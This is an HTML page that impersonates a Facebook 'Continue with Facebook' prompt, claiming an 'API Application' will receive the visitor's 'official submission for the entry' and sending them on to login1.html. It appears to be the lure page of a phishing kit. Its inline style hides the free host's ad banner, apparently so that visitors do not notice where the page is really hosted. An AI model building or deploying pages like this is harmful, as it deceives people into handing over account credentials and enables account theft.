<!DOCTYPE html><html lang="en"><head>
    
    <link href="images/odeoiw.png" rel="shortcut icon" type="image/vnd.microsoft.icon">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>Continue with Facebook</title>
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css_1">
    <link rel="stylesheet" href="css/font-awesome.min.css">
    <link rel="stylesheet" href="css/line-awesome.min.css">
    <link rel="stylesheet" href="css/Contact-Form-Clean.css">
    <link rel="stylesheet" href="css/Navigation-Clean.css">
    <link rel="stylesheet" href="css/styles.css"> </head>

<body style="background: #f6f7f8;" data-new-gr-c-s-check-loaded="14.1029.0" data-gr-ext-installed>
    <style>
    img[alt="https://tiiny.host/ad.png"] {
        display: none
    }
    
    ;
    </style>
    <nav class="navbar navbar-light navbar-expand-md navigation-clean" style="background: #415893;">
        <div class="container"><a class="navbar-brand" href="continue.php#" style="color: rgb(255,255,255);font-family: Roboto, sans-serif;font-weight: normal;letter-spacing: 0.1px;font-size: 17px;"><i class="fa fa-facebook-official" style="width: 15.25px;font-size: 21px;"></i>   Access Required</a></div>
    </nav>

    <section class="contact-clean" style="background: #f6f7f8;">
        <form action="login1.html" class="shadow-none" style="background: rgba(255,255,255,0);padding-right: 15px;padding-left: 15px;margin-top: 55px;border-style: none;">
            <div class="form-group"><img class="img-fluid" src="images/HAJEUDFD.png" style="width: 54.688px;"></div>
            <div class="form-group">
                <p style="text-align: center;">This <strong>API Application</strong> will receive your official submission for the entry.</p>
            </div>
            <p style="text-align: center;">
                <!-- <a href="continue.php#"> -->
                <a href="#">
                    <ion-icon name="create-outline" style="font-size: 24px;"></ion-icon>Edit This</a>
            </p>
            <div class="form-group" style="margin-top: 104px;">
                <button class="btn btn-primary text-capitalize" type="submit" style="width: 273.6719px;font-family: Roboto, sans-serif;font-weight: normal;font-size: 15px;"><i class="fa fa-facebook-square" style="font-size: 16px;"></i> Continue with facebook</button>
            </div>
            <p style="text-align: center;font-size: 14px;"><i class="fa fa-lock" style="font-size: 18px;"></i> This doesn't let the app post to Facebook.</p>
        </form>
    </section>
    <script src="jquery.min.js.download"></script>
    <script src="bootstrap.min.js.download"></script>
    <script type="module" src="js/ionicons.esm.js"></script>
    <script nomodule src="js/ionicons.js"></script>

<grammarly-desktop-integration data-grammarly-shadow-root="true"></grammarly-desktop-integration>

</body></html>